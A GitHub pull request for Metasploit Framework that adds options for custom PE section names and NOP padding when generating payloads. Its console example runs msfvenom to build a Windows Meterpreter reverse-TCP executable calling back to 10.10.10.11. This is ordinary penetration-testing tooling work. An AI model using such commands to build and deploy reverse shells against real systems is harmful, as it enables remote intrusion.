Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add opt --sec-name for msfvenom; Implement -S, -P for cmd dispatcher #11400

Merged
merged 5 commits into from Feb 20, 2019

Conversation

7043mcgeep
Copy link
Contributor

@7043mcgeep 7043mcgeep commented Feb 13, 2019

Add option --sec-name <String> to msfvenom to give the user the ability to specify a custom section header name when generating (large) Windows binaries that require a new section to fit the payload. Resolves #6637

Implement --sec-name and --pad-nops for msfconsole command dispatcher (to use on a payload module directly).

To keep things clean, no console output was added/modified in these implementations (aside from option help menus).

msfvenom Verification

  • Run msfvenom with --sec-name option on the console.

Console Output

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --sec-name pdata -p windows/meterpreter_reverse_tcp LHOST=10.10.10.11 -f exe -o /tmp/stageless8000.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 179779 bytes
Final size of exe file: 254976 bytes
Saved as: /tmp/stageless8000.exe

In the above example, the user specifies a new section header name "pdata" when generating a stageless payload with the default template.

To verify the section name was added to the PE, you can open the .exe in a PE viewer, such as CFF Explorer, as shown in this screenshot.

Command dispatcher verification

  • Run msfconsole and use a payload. Set necessary parameters.
  • Run generate on any payload module with options -S (section name) or -P (pad nops).

Here's an example of -P. Notice the diff output; 100 bytes is a result of -S 100 option, automatically prepending (100-63=37) nops.

Here's an example of -S.

And here's proof that the above example command generate -S pdata -f exe -o secname-cmddispatch.exe generates the correct section header name: screenshot

@busterb busterb self-assigned this Feb 15, 2019
@busterb busterb merged commit 53143d5 into rapid7:master Feb 20, 2019
@busterb
Copy link
Member

busterb commented Feb 20, 2019

Release Notes

This adds the ability for Metasploit payload generation to add a custom section header name for where to insert a generated payload in Windows executables. It also adds the ability to specify the pad-nops option from the generate command from within msfconsole.

@busterb
Copy link
Member

busterb commented Feb 20, 2019

Thanks for keeping at it @7043mcgeep!

@jmartin-tech
Copy link
Contributor

Marking msf5 since this builds on generator options changes in #8999.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants